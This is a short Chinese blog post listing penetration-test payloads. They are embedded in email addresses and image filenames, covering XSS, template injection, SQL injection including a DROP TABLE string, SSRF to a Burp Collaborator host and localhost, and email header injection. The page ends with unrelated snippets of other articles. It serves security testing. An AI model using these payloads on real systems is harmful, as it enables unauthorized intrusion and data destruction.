测试点的payload

2023-05-16

一些测试点的payload,后续继续补充

    • 电子邮件地址
    • 图片名字

电子邮件地址

以下payload都是有效的电子邮件地址

XSS(跨站脚本):

test+(<script>alert(0)</script>)@example.comtest@example(<script>alert(0)</script>).com"<script>alert(0)</script>"@example.com

模板注入:

"<%=7 * 7 %>"@example.com
test+(${{7*7}})@example.com

SQL注入

"'OR 1=1 -- '"@example.com
"mail');DROP TABLE users;--"@example.com

SSRF(服务器端请求伪造):

john.doe@abc123.burpcollaborator.net
john.doe@[127.0.0.1]

参数污染:

victim&email=attacker@example.com

(电子邮件)标头注入:

"%0d%0aContent-Length:%200%0d%0a%0d%0a"@example.com

"recipient@test.com>\r\nRCPTTO:<victim+"@test.com

图片名字

<imgsrc=x onerror=alert('XSS')>.png
"><imgsrc=x onerror=alert('XSS')>.png
"><svgonmouseover=alert(1)>.svg
<<script>alert('xss')<!--a-->a.png

这可能仅在基于UNIX的系统上有效,因为Windows上不接受特殊字符作为文件名。但是,作为反射的XSS,它应该可以通用。

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

测试点的payload 的相关文章

  • 11-C语言对寄存器的封装

    1 xff1a 仅通过指针进行封装 xff1a 编译可能出错 xff0c 这个地方只是表示思路 在基地址基础上加上偏移地址 define GPIOF BASE 0x40021400 define GPIOF BASE 0x40021400
  • 13-寄存器编写程序入门

    与51单片机对比 xff0c 32单片机控制寄存器要复杂的多 xff1b 在51单片机中 xff0c 可以直接控制端口的高低电平 xff1b 然而32单片机却不可以 xff0c 因为32为了减小功耗 xff0c 默认情况下这些时钟都是关闭的
  • C++两个类头文件互相包含

    在构造自己的类时 xff0c 有可能会碰到两个类之间的相互引用问题 xff0c 例如 xff1a 定义了类A类B xff0c A中使用了B定义的类型 xff0c B中也使用了A定义的类型 class A int i B b class B

随机推荐

  • 【手拉手 带你准备电赛】April Tag标记跟踪(3D定位)详解

    目录 关于April Tag April Tag介绍 April Tag分类 April Tag标记跟踪原理 April Tag标记跟踪代码分析 April Tag标记跟踪测试结果 相关内容解惑 梯度图像 关于April Tag April
  • VS 无法打开源文件<WinSock2.h> <stdio.h> 等

    一 重装SDK 1 在开始菜单栏打开 VS installer xff1b 在出现的页面中选择 修改 2 修改SDK 注意左侧左侧红色方框中的内容不要点 在右侧 安装详细信息 一栏找到 使用C 43 43 桌面开发 取消勾选已安装的SDK
  • error: #error PCL requires C++14 or above

    运行带有PCL库的文件时报错 error PCL requires C 43 43 14 or above 解决办法 xff1a 找到工程里所有依赖于PCL的功能包 xff0c 改它们对应的CMakelists txt文件 具体修改方法 x
  • ubuntu18.04安装nvidia_driver_510+cuda_11.6+cudnn_11.x

    一 安装nvidia driver 1 在 软件和更新 中选择一个可用的驱动 2 1首先我们需要添加源 sudo add apt repository ppa graphics drivers ppa sudo apt update 2 2
  • Ubuntu18.04下pointnet2(pointnet++)复现

    一 nvidia driver 510 43 cuda 11 6 43 cudnn 11 x安装配置 ubuntu18 04安装nvidia driver 510 43 cuda 11 6 43 cudnn 11 x CPU疼的博客 CSD
  • 镭神激光雷达c16 数据转pcd(基于ros)

    一 问题描述 xff1a 初次接触激光雷达 xff0c rosbag命令录制后 xff0c 用ros pcl中bag to pcd命令转换成的pcd文件 xff0c pcl viewer 即pcl库无法读取 xff0c cloudcompa
  • unbuntu18.04 install pytorch1.8-cpu+yolov5

    1 install pytorch 1 change pip source reference link 2 install all pip3 install torchvision 61 61 0 9 0 pip3 install tor
  • 四、数据转换、ros-CAN通讯

    1 CAN通讯 1 1驱动安装 1 1 1在我的gitee上下载test功能包 xff0c 将libusbcan so文件复制到 lib 其他位置 计算机 lib 目录下 1 2参考 我另一篇博客一 2 1 3 下载功能包 1 3 1 在我
  • Ubuntu20.04 服务器版本 命令学习

    1 vim使用 sudo vim 文件名 按a或i进入编辑模式 按两次Esc进入命令模式 输入 xff1a wq 保存退出 输入 xff1a q xff01 退出 2 apt使用 查看更新 sudo apt update 执行更新 sudo
  • 地平线旭日X3派(一)系统配置

    一 SSH登录 1 1 串口配置 43 串口登录 1 1 1无线网络配置 1 2 SSH登录 1 3 修改文件 用vim 1 4 安装togetherROS 1 4 1 安装ROS2 foxy 安装基础功能包 sudo apt instal
  • 关于UDP的普通C/S模型、广播C/S模型以及组播C/S模型

    简述 xff1a UDP与TCP一个主要的区别就是客户端与服务器之间不需要建立连接 xff0c 即不经历三次握手过程 只需要主动发送数据的一方确定接收数据的一方的地址信息 xff08 IP地址 43 端口号 xff09 xff0c 可以这么
  • 里程计(一) 数学模型及STM32实现

    一 首先确保接线和硬件没问题 xff0c 并确定控制逻辑 测试单片机 驱动板 L298N 电机连线是否接通 xff1a 控制板IN1 IN2一个接3 3V一个接GND ENA默认使能 xff1b 控制板IN3 IN4一个接3 3V一个接GN
  • 关于Keil在stm32编写库函数时头文件找不到的解决方法

    最近在自主学习stm32时遇到了fatal error xff1a h files not found xff0c 总结了一下自己的解决方法 1 首先检查在add files有没有选择all files xff0c 如果默认选择source
  • bypassuac的学习

    什么是UAC 为什么要绕过他MSF自带的bypassuac模块 在Vista及更高版本中通过弹框进一步让用户确认是否授权当前可执行文件来达到阻止恶意程序的目的 为什么要绕过他 为了远程执行目标的exe或者bat可执行文件绕过此安全机制 xf
  • thinkphp3.2.3学习(1)

    thinkphp3 2 3学习 xff08 1 xff09 MVC结构 MVC结构 M gt model数据模型 V gt view识图 C gt controller控制器 lt php return array 39 配置项 39 61
  • thinkphp3.2.3学习(2)

    thinkphp3 2 3学习 xff08 2 xff09 如何读取配置文件路由四种url模式url的设置 函数控制器绑定参数url生成跳转页面重定向输入变量 如何读取配置文件 使用C函数 C 属性名 xff1b 动态配置 C 属性名 xf
  • xdebug下载与配置,有这一篇就够了

    xdebug下载与配置 xff0c 有这一篇就够了 xdebug下载与配置环境步骤一步骤二步骤三步骤四步骤五遇到的问题解决方案第一个坑第二个坑第三个坑 下面是我的xdebug的配置 xdebug下载与配置 下载xdebug的地方https
  • windows下3389端口开启和连接

    windows下3389端口开启和连接 开启3389的命令关闭防火墙的命令添加用户添加到管理员组特殊情况 netstat ano 查看端口开放情况 开启3389的命令 REG ADD HKLM SYSTEM CurrentControlSe
  • ssrf绕过

    ssrf绕过 当涉及到SSRF xff08 服务器端请求伪造 xff09 时 xff0c 可以使用以下5种有效负载绕过防御 xff1a 1 xff09 使用CIDR绕过SSRF xff1a http 127 127 127 127 http
  • 测试点的payload

    一些测试点的payload xff0c 后续继续补充 电子邮件地址图片名字 电子邮件地址 以下payload都是有效的电子邮件地址 XSS xff08 跨站脚本 xff09 xff1a test 43 lt script gt alert